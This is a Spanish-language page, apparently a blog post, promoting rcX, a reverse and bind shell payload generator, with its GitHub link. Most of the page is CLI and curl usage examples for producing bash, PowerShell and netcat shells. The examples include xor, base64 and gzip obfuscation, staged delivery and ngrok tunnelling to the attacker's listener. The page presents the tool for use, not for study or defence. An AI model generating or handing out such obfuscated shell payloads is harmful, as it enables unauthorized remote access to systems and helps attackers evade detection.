rcX Un Potente Generador de Shell Inversa
rcX Un Potente Generador de Shell Inversa

rcX: Un Potente Generador de Shell Inversa

El predecesor de rcX es rsGen (un generador de carga útil inversa). Actualmente, es un potente generador de reverse shell y bind shell. En el futuro se añadirán más funciones.

  • rc” – significa comando remoto o código remoto (remote command).
  • X” – se puede entender como asistente o herramienta.

Uso Local

Descarga los binarios empaquetados aquí, o ejecuta el siguiente comando:

pip install -r requirements.txt

Uso de la CLI

Ejemplos:

1. Obtener una shell inversa de bash y la salida en formato tabular.

python rcX.py -l 127.0.0.1 -p 8888 -t bash --table
Uso CLI de rcX
Uso CLI de rcX

2.Ruta de acceso al shell personalizada.

python rcX.py -l 127.0.0.1 -p 8888 -t bash -s "/bin/sh"

3. Copiar la carga útil de id especificada en el portapapeles.

python rcX.py -l 127.0.0.1 -p 8888 -t bash --table -c 5

4. Obtener un shell inverso bash codificado en base64.

python rcX.py -l 127.0.0.1 -p 8888 -t bash -e base64

5. Obtener una shell inversa bash codificada y ofuscada.

python rcX.py -l 127.0.0.1 -p 8888 -t bash -e xor --obf reverse --table --clip 7
Ejemplo de shell inversa ofuscada
Ejemplo de shell inversa ofuscada
  1. Obtener una shell inversa bash de staging.
python rcX.py -l 127.0.0.1 -p 8888 -t bash --staging-url 0 --staging-cmd 0

7. Obtener una shell inversa bash y reenviar el puerto local utilizando el túnel ngrok.

python rcX.py -l 127.0.0.1 -p 8888 -t bash --tunnel ngrok_jp

8. Obtener un shell inverso de Windows Powershell.

python rcX.py -l 127.0.0.1 -p 8888 -t powershell -P windows

Interfaz web

Al mismo tiempo, rcX también proporciona una interfaz web. Utiliza rcX como servidor y luego podrás utilizarlo con tu equipo o amigos.

Consejo

Cuando rcX se ejecuta como servidor, si el origen de la petición no es 127.0.0.1 o localhost, la función de túnel ngrok se desactivará y las opciones relacionadas se ocultarán en el Front-end

Ejemplo:

python rcX.py -w

Web CLI

Cuando rcX se ejecuta como servidor, puedes utilizar curl en el terminal para obtener la carga útil.

Ejemplos:

1. Obtener una carga útil de shell inversa bash

curl http://127.0.0.1/linux/bash/127.0.0.4/8888
Ejemplo de web CLI con rcX
Ejemplo de web CLI con rcX

2. Codificación Base64

curl http://127.0.0.1/linux/bash/127.0.0.4/8888/base64

3. Codificación Base64 y hexadecimal

curl http://127.0.0.1/linux/bash/127.0.0.4/8888/base64,hex

4. Compresión Gzip y replace_char (método de ofuscación)

curl http://127.0.0.1/linux/bash/127.0.0.4/8888/gzip/replace_char

5. xor codificado e inverso(método de ofuscación)

curl http://127.0.0.1/linux/bash/127.0.0.4/8888/xor/reverse

6. Obtener una carga útil de shell inversa de Windows PowerShell

curl http://127.0.0.1/windows/powershell/127.0.0.4/44444

7. replace_char(método de ofuscación) sólo sin usar codificador

curl http://127.0.0.1/windows/powershell/127.0.0.4/44444/,/replace_char

8. Utilizar sólo la puesta en escena, sin ningún codificador y ofuscador

curl http://127.0.0.1/linux/bash/127.0.0.4/8888/,/,/1/1

9. Obtener una carga útil de shell bind netcat

curl http://127.0.0.1/bind/linux/netcat/127.0.0.4/8888
https://github.com/FlyfishSec/rcX

Mi Carro Close (×)

Tu carrito está vacío
Ver tienda